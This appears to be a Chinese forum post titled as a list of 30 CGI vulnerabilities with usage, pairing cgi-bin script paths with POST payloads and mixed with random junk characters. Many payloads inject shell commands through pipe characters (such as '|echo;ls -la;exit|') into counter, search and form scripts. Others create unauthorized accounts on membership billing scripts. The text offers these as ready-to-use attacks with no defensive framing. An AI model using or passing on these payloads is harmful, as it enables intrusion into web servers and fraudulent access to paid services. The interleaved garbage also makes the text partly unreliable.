Cgi-bin 30个漏洞＋使用方法

admin

==============================
; ~8 U. Y1 q3 f5 o( y
: \5 {) z8 S9 I4 Z/ O% n/smspass.pl
username=username&password=password
) `* ?  }$ X2 r2 x2 V
1 `7 o4 m+ C8 ~+ J* h; F0 N/index.cgi
/ U. p0 r( h/ Q  H: d* C  awei=ren&gen=command
& N+ K: M; f8 U6 ~- }
/passmaster.cgi
Action=Add&Username=Username&Password=Password

( H4 X7 M0 ]' W: b/accountcreate.cgi
5 Y: }5 N- J3 Iusername=username&password=password&ref1=|echo;ls|
$ \. w% T' C7 |: _1 J* `0 I3 c, X% I7 H
/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
6 o' V$ }* X5 D' e" h' A3 t
+ Z7 H& T" P. V& s  v' e4 F2 r7 Z/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
6 K. h$ X; F7 O9 puser=username&pass=Password&confirm=Password
& R8 n( `7 h6 G  S% X+ p  c
/ccbill-local.asp
post_values=username:password
' P2 r1 _1 V+ M5 E0 l! u
/count.cgi
0 j3 n/ f9 F/ J) ~" xpinfile=|echo;ls -la;exit|

/recon.cgi
6 X2 Y, g# H/ f4 D# z+ _% P( _6 W/recon.cgi?search
- u( u0 \2 b5 q5 }searchoption=1&searchfor=|echo;ls -al;exit|
- ?* F+ w' ^( L) X8 }' b
2 _( H: F; [& {. ?2 Y, y/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>

/af.cgi
_browser_out=|echo;ls -la;exit;|

/modify.cgi
2 j4 T$ x' n& o9 |username=username&password=password&expire=30
6 q9 c0 l% j3 H! Z& y
/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|
4 ]* @! q4 i8 j8 B' H
/gx9passwd.cgi
cmd=ADD&user=username&pass=password

2 E7 ~& n' v, m/probecontrol.cgi
command=enable&username=username&password=password
, y8 z4 X" U0 c$ x! J7 \+ ?3 M' h
/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit

& t" q" a8 z* ]/htadd.pl
' u( K; ]3 Y/ }& P5 K7 Hconfigfile=|echo; ls -alt; exit
6 T1 x0 z6 ?' _6 z
$ A8 K% K+ X% m% `" p/gx9passwd.cgi
9 ~$ o" L2 C! W$ b; ucmd=ADD&user=username&pass=password

) ~$ p/ v5 y( ?* i; l/ibill*.pl
+ T$ g8 a' y) A5 O" J" qreqtype=add&authpwd=authpwd&username=username&password=password

8 f3 r3 B( s  E3 b" T/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)
+ ~% I( ]; q! W+ D
7 E0 v- `. T; ], W! S/globill_ut.cgi
4 y/ G+ A' U5 q( y- n7 L* d# O$ K$ Gdo=add&username=username&password=password&wpassword=password

/usercontrol.cgi
command=enable&username=USER&password=PASS
% B3 ~+ \1 m" K( M% T& W' `( f* N  o
/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password
9 ?( F& g: m# h; Y4 r: R
  @/ L1 }  |, J6 l/addusr.pl
user=USER&pass=PASS&confirm=PASS
0 J' ~# f2 x" n  J' [3 O
/ E# L! M  n  W8 V3 H9 T  b/pincount.cgi
7 m2 V% _. a+ j: _) Y# D5 e/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|
9 k- P% q2 Z% E
" q6 @! `0 B2 E" f; Q; K& I/accountcreate.cgi
6 z! u" Y2 ^; t# O+ `' g6 j9 |2 Z9 B/cgi-bin/gateway/accountcreate.cgi
0 h8 q/ h' H8 Y/ Eusername=username&password=password&password2=password&ref1=|echo;ls -al;exit
! _/ \5 V: N+ M/ u+ b
/af.cgi
& q1 V/ l5 {8 }: B: t/env.cgi
ADD+;echo;pwd;exit

* E# l# X: e1 f9 U, K/ `) b! ~; L4 ~/count.cgi
pinfile=|echo;pwd;exit|
% f+ v+ a! u" h( V
/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|

; \5 ]5 j+ e# r, R7 i+ H/add.cgi
( q. q/ F9 ?' r! O2 uusername=username&password=password&expire=30

==============================
& Z; c( x3 l" L! ]) _! L) V